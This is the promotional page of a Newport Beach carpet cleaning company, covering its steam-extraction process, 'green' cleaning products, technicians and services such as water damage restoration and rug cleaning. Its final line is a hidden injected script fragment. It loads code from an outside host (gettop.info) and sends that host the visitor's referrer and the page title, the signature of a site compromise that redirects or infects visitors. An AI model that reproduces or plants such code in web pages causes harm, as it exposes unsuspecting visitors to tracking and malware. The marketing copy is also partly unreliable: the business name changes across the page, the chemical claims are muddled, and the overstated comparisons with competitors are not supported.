Welcome to Newport Beach Carpet Cleaning, Repair, Water Damage Established in 1987, Pacific Newport Beach Carpet Cleaning, Repair, Water Damage is the first and best Environmentally conscious steam cleaning company in Los Angeles, CA. We are fully Licensed, Trained and Certified. From our GREEN-SEAL Certified Premium Cleaning Products to our sustainable dumping practices, Pacific Newport Beach Carpet Cleaning repair & Water Damage Restoration uses ONLY Ultra-Premium cleaning products that possess far superior cleaning capabilities, are non-toxic, Bio-Degradable, non-irritant and safer for environmental disposal.
OUR DEEP CLEANING PROCESS:
1) Pre-Vacuum Carpets and Move most Furniture
2) Pre Spray with “Power Burst”- A minimum residue, HIGH pH Enzyme that digests food and soil
3) Pre Treat Spots with “Citrus-Pro”- A non-toxic Citrus based Dry Solvent that removes oily
4) Pre Condition with “UltraPac Traffic Clean”- A HIGH pH Traffic Lane Cleaner
5) Extract with “All Fiber Rinse”- A LOW pH Residue and Soap remover. This product allows BOTH
the dirt AND Soap to be extracted completely, leaving no trace of residue and NO Spots that
6) Spray “Kill Odor Antimicrobial”- A Sanitizer and Deodorizer that kills Mites and Refreshes
carpets to a like new condition.
7) Treat with “DuPont Advanced Teflon”- the Ultra-Premium, 18 month Carpet Protectant.
WHAT MAKES A GREAT CARPET CLEANING EXPERIENCE?
The three most important factors to consider are:
1) What Process is Used? Steam Cleaning or Dry Cleaning?
2) What Products are Used? Premium or Cheap? Green-Seal Approved or Not?
3) Better Technicians –The level of Training, Experience and Attitude of the Technicians?
WHAT IS THE BEST CARPET CLEANING PROCESS?
According to the major carpet manufacturers, it is Hot Water Extraction or Steam Cleaning followed by a No-Residue Fiber Rinse. The following web link is a list of major carpet manufacturers and their recommendations for what carpet cleaning process is necessary to qualify for their respective customer warranties. This information was sourced directly from the Carpet and Rug Institute:
DOES NEWPORT BEACH — USE STEAM CLEANING OR DRY CLEANING?
Pacific Newport Beach Carpet Cleaning uses ONLY Hot Water Steam Extraction, with Advanced Carpet Cleaning Products, followed by a No Residue Carpet Fiber Rinse, the most comprehensive and results-driven method of cleaning.
High Pressure Steam Cleaning with 235 degree Steam, in combination with the best carpet cleaning products is the ONLY method that successfully removes ALL of the soap and dirt from carpets that Dry Cleaning and other Steam Cleaners leave behind. Simply stated, the technology is NEWER, SAFER and FAR more effective at both emulsifying and releasing ground in traffic lanes, dark oily spots from carpets, pet stains, odor and carpet discoloration caused by food and drink spills.
Unfortunately some Carpet Cleaners use the weaker, outdated and more harmful, “Dry Cleaning” process, which often leaves copious amounts of soap in the carpet, thereby causing sticky residue that actually attracts more dirt! At Pacific Newport Beach Carpet Cleaning, we use only State-of-the-Art Carpet Steam Cleaning machines and products that leave absolutely no trace of soap behind, leaving your carpets cleaner, and keeping them in good condition longer.
HOW ARE ECO-GREEN PRODUCTS DIFFERENT FROM REGULAR CHEMICAL CLEANING PRODUCTS?
Eco Green Newport Beach Carpet Cleaning uses only products that meet the Carpet and Rug Institute , or CRI, Green Seal of Approval for being Non Toxic and posing a Zero Health Risk.
FACT: ALL Carpet Cleaning products contain some form of chemicals. Anything else is simply not true. The difference is we use Ultra-Premium Products, which also happen to surpass the Green Seal of Approval by the Carpet and Rug Institute.
WHAT ARE ECO-GREEN CARPET CLEANING PRODUCTS?
Carpet and Rug Institute Green Seal Certification of Approval requires that any product meet the following qualifications:
1) Biodegradable: All of our carpet cleaning products are fully biodegradable. They do not contaminate the ocean or drinking waters. This is possible because the solvents we used are citrus based dry solvents and do not contain lingering chemical compounds.
2) VOC Compliant: None of our carpet cleaning products contain kerosene, or other ethanol compounds, harmful to the environment and highly toxic to breathe. In fact, California law prohibits all Carpet Cleaners from using these chemicals and they are not sold in California.
3) Non-Toxic, Non-Irritant, Phosphate and Ethanol-free: For example we use a spot remover/degreaser called Pro-Chem “Citrus-Pro” This product is the Rolls-Royce of safe, non-toxic degreasers that remove grit, grime and sticky traffic lanes. Citrus-Pro costs more than other solvents because it contains d-Limonene, the most powerful solvent available, and it happens to be organic and non-toxic. CITRUS-PRO IS FAR MORE EFFECTIVE THAN THE MOST HARMFUL CHEMICAL COUNTERPARTS.
4) Health Hazard Score ZERO: Score a Zero out of possible Four, in diluted form, for the Health Hazard rating. As with all Professional-Grade Carpet Cleaning Products, a chart demonstrating the Health hazard rating MUST be displayed. ALL of our products score a 1 out of 4 or LESS in concentrated form and a 0 out of 4 in ready-to-use potency.
WHAT IS DIFFERENCE BETWEEN STEAM CLEANING AND DRY CLEANING?
For the past thirty years, Dry Cleaning was very popular, however that method leaves extraordinary amounts of both dirt and soapy chemical residue in the carpets, causing the spots to return after a short period of time and sometimes causing harmful skin irritations or toxic fumes.
The reason that Dry-Cleaning methods are no longer recommended is because they do not actually use vacuums, but rather Dry Cleaning (you know the companies) use high speed spinning pads to supposedly “collect” the dirt and soap. However, there is absolutely no extraction of soap OR dirt out of the carpet, leaving toxic soap and dirt in the carpet.
BREAK THE VISCOUS CYCLE OF “SPOTS COMING BACK”
Essentially, soap that is left in carpets attracts new dirt. Therefore, Dry Cleaning or Steam Cleaning without using a LOW pH Rinse, causes the soapy areas, those which were the dirtiest to begin with, to become dirty again in a shorter period of time because there is no soap removal.
In a way, it begins a viscous cycle wherein the “Dry Cleaner” must return every 3 months to keep getting the same dirt back out. In reality, Dry Cleaning simply wipes some dirt off and leaves a lot of soap and dirt behind.
Even steam cleaners, who do not use the LOW pH FIBER RINSE, are not getting all of the soap out of the carpet and leaving a toxic, irritant and dirt-attracting high pH residue.
TECHNICIANS- LICENSED, TRAINED, CERTIFIED, EXPERIENCED AND POLITE
All of our technicians were hand picked for their knowledge of carpets, upholstery, drapes, tile and restoration experience. Here are our qualifications:
1) Experienced for more than 5 years.
2) Experienced in all Steam Cleaning processes, knowledgeable about equipment hazards.
3) Experienced in ALL Spot Removal, including understanding of fabrics, silks and pet spots
4) Polite, Friendly, safe around pets and children.
NEWPORT BEACH NEWEST METHOD OF CARPET CLEANING:
New ZERO Residue technology is the most preferred method and our clients agree. We use a special RINSE that completely removes residue, soap and dirt, leaving the carpets fluffier and softer than ever! High-Powered Equipment means fast dry times. Our products are the Safest and most Effective on the market today. We use the latest in hot water steam extraction technology, the only method recommended by the largest carpet manufacturers. Deep cleaning technology dissolves and lifts away dirt, grease and allergens that hide in your carpets. We leave your carpet looking clean and refreshed.
NEWPORT BEACH TILE & GROUT CLEANING:
Our professional quality high power cleaning process deep cleans your tile floors. Mopping and brushing can’t begin to lift up the ground in dirt and oils that ruin the appearance of you tile floors. Only high pressure washing combined with the most dependable dirt and stain removers will leave your tile and grout sparkling clean.
NEWPORT BEACH WATER DAMAGE RESTORATION:
Even the smallest amount of flooding from an overflowing appliance or a leak can cause a great deal of damage to your home. Our professional Water Damage Restoration system removes all types of damage causing moisture quickly and effectively. We’re available 24 hours a day to rescue your carpets from flooding and water damage.
NEWPORT BEACH PET STAIN & ODOR REMOVAL / SANITIZING
We don’t just cover up pet stains and odors, we remove them permanently. Our deep cleaning method powerfully dissolves nasty pet stains and odor causing organic residues. Our high pressure extraction system removes all traces of the unwanted surprises that your cats and dogs leave behind.
We use the most highly rated professional products that sanitize your pet stained carpets and leave them smelling fresh.
NEWPORT BEACH SOFA CLEANING
Our professional strength upholstery cleaning process helps prolong the life of your furniture by extracting dirt and soil from the upholstery fabric. By having your upholstery professionally cleaned on a regular basis you eliminate dirt particles that cause wear and tear on the fabric. Regular professional cleaning also removes allergens trapped in the fabric.
NEWPORT BEACH LEATHER FURNITURE CLEANING
Our professionally trained technicians use the most advanced leather cleaners that moisturize and protect your valuable leather furniture. We follow manufacturers’ strict recommendations and employ only the most trusted products in the industry.
NEWPORT BEACH AREA, ORIENTAL AND PERSIAN RUG CLEANING
We specialize in cleaning the delicate fabricates found in most area rugs. We gently remove the ground in dirt and stains from all types of rugs including Persian, Woven, Oriental area rugs. Our process prevents “rings” of color or browning. Rugs are returned to like-new condition and colors are BRIGHTER than ever.
MOLD & MILDEW
Our high pressure extraction system is the only one recommended for removing mold and mildew that thrive in your carpets. Regular professional cleaning dissolves away mold and mildew causing bacteria and the musty odors they generate.
NEWPORT BEACH CARPET PROTECTANT
Your carpet came with a coat of protectant when it was new. After years of cleaning and daily foot traffic, that protection has been worn away. We’ll reapply a fresh coat of Teflon or ScotchGuard to help your carpets resist stains as well as daily wear and tear.
Newport Beach Carpet Cleaning, Repair, Water Damage is the first and best Environmentally conscious steam cleaning company in Los Angeles, CA. We are fully Licensed, Trained and Certified. From our GREEN-SEAL Certified Premium Cleaning Products to our sustainable dumping practices, Eco Green Newport Beach Carpet Cleaning Repair & Water Damage Restoration uses ONLY Ultra-Premium cleaning products that possess far superior cleaning capabilities, are non-toxic, Bio-Degradable, non-irritant and safer for environmental disposal.
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;